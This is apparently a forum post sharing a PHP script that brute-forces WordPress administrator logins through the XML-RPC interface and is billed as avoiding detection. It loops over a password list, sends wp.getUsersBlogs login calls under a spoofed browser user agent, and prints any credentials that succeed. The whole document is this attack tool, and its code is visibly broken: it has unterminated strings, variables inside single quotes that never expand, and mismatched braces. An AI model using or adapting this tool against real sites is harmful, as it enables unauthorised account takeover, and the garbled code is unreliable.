Wordpress XmlRpc Bruteforcer to avoid detection
Code:
Usage: php xml_rpc.php target + xml_rpc_path user password_list';
if(isset($argv[1], $argv[2], $argv[3],$argv[4])) {
echo $banner;
$target = $argv[1];
$xml_rpc_path=$argv[2];
$username = $argv[3];
$password_list = $argv[4];//use the value of current iteracy of loop
$set_ramsees_sphinx="wp.getUsersBlogs";
$lines = file($password_list);
foreach ($lines as $line)
{
echo "\nAttacking: " . $target . attempting to brute force through xml rpc interface "\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/$xml_rpc_path");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,'<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>$set_ramsees_sphinx</methodName><params><param><value>$username</value></param><param><value>$line</value></param></params></methodCall>)';
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
if(preg_match("/isAdmin/", $buf, $matches)){
echo " admin account bruted:\nhttp://" . $target . "/xml_rpc.php\n";
echo $username . ":" . $line;
} else {
if(preg_match("/faultCode/", $buf, $matches))
echo "Error! An error occured. Account may not of been bruted.";
}
} else {
echo $banner;
}
}
?>
